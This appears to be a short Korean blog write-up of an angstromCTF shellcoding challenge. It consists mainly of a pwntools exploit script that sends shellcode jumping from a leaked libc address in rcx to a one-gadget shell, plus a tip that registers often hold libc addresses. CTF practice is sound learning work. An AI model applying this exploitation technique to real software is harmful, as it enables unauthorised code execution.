This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| shell = ssh("team****","shell.angstromctf.com",port=22,password="****") | |
| #p = process("./hellcode") | |
| context.arch = 'amd64' | |
| sh = shell.process('/bin/sh', env={'PS1':''}) | |
| p = shell.process("/problems/hellcode/hellcode") | |
| pay = "sub rcx, 0x%x; push rcx; ret" % (0x7f2b06d28777 - (0x7f2b06c27000 + 0x45216)) | |
| p.sendline(asm(pay)) | |
| p.interactive() |
이런식으로 쉽게 풀수 있다.
Shellcoding 문제가 나왔을때 shellcode 가 실행될 때 레지스터를 잘 살펴보면 libc 주소가 들어있는 경우가 있기 때문에,
이를 잘 이용하면 쉽게 풀릴수도있다
'Pwnable' 카테고리의 다른 글
| [SwampCTF 2018] (0) | 2018.04.01 |
|---|---|
| [Securients 2018] (0) | 2018.03.26 |
| [N1CTF2018] Vote (0) | 2018.03.12 |
| BCTF2016 bcloud (0) | 2018.03.09 |
| Pyjail (0) | 2018.03.03 |